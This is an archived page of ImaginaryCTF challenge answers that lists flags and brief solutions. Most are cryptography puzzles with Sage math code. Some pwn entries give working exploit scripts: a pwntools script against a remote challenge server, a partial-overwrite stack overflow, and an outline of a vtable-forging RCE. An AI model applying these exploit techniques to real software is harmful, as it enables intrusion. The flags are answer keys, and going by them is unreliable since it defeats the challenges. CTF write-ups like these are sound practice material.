Archived Challenges - November 2023

ictf{40rounds?}

ictf{40rounds?}

Play fizzbuzz with it, and it should spit out the flag.

ictf{crypto_makes_me_cry_b12f9e53}

base64(#include"flag.txt") = I2luY2x1ZGUiZmxhZy50eHQi

ictf{includ3_is_0p}

Sort the 6! permutations of crypto in alphabetical order, then the nth permutation just represents the byte n.

ictf{E_is_crypto}

https://imaginaryctf.org/f/g4U1S#solve.py

ictf{rivest_shamir_adleman_is_evirfg_funzve_nqyrzna}

Same idea as https://math.stackexchange.com/questions/115149/how-to-find-minimum-n-that-gcdanb-an1b-neq-1 , but you don't really need to factor the resultant as computing polynomial gcd is enough.

x = polygen(ZZ)
f = x**13 + 37
g = (x + 42) ** 13 + 42
v = abs(ZZ(f.resultant(g)))
print(v)

R = Zmod(v)
ff = f.change_ring(R)
gg = g.change_ring(R)
while gg:
    ff, gg = gg, ff % gg
x = ZZ(-ff[0] / ff[1])
print(x)
print(gcd(f(x), g(x)))

ictf{the_answer_to_the_1337th_universe_is_15682...36957}

Franklin-Reiter. https://imaginaryctf.org/f/Fq0RW#solve.sage

ictf{Gaius_Cassius_Longinus_plots_secretly...}

import pickle
print(pickle.loads(bytes.fromhex("800495290000000000000043256c6677697b677268765f6664687664755f76646f64675f6b6479685f736c666e6f68763f7d942e")))

Then bruteforce the output using caesar cipher

ictf{does_caesar_salad_have_pickles?}

We have an arbitrary OOB read/write in set/range_min. Use this to leak the vtable address, which gives us a PIE leak, and the address of the vector member in MinSegmentTree, which gives is a heap leak. Then we can read from the GOT which gives us a libc leak. Finally, forge a vtable and use a one-gadget to get RCE.

https://imaginaryctf.org/f/fc3dX#solve.py

ictf{h0p_0ff_c0d3f0rc35_0583a9b8}

https://imaginaryctf.org/f/LjioL#solve.md for detailed solution https://imaginaryctf.org/f/LjioL#solve.py

ictf{was_really_wondering_why_they_have_golf_equipment_in_the_jail}

Notice how one of the files is different size from the others. Inside that, searching "127.0.0.1" shows us the flag. Just need to be curious for this one.

ictf{OnFire}

from pwn import *
from aes import AES # custom AES with fixed sbox

context.binary = elf = ELF("./vuln")
conn = process()
conn = remote("34.90.59.166", 1337)

conn.sendline(b"2") # delete cipher
conn.sendline(b"0") # aes

conn.sendline(b"1") # create cipher
conn.sendline(b"2") # nop

conn.sendline(b"6") # encrypt flag
conn.sendline(b"1") # index

conn.sendline(b"5") # view secret
conn.recvuntil(b"ciphertext to view (0-15): ")
conn.sendline(b"1") # index

c = AES(b'\0'*16)
flag = bytes.fromhex(conn.recvline().decode()) # get key
print(c.decrypt_cbc(flag, b'\0'*16)[12:])```

ictf{osint_or_cheese?}

All protections are enabled except for the canary. There's a stack overflow that you can exploit. Since PIE is on we can only do 1 partial overwrite. Notice that we can return into the middle of the main challenge function (and luckily there's a null byte at rsp once you do a ret). Write 2 bytes and pray that the last nibble is correct.

from pwn import *
r = process('./fish')
# 1/16 chance
r.send(b'a'*120+p16(0x53c2))
r.interactive()```

ictf{601n6_f15h1n6_f90f1fb5}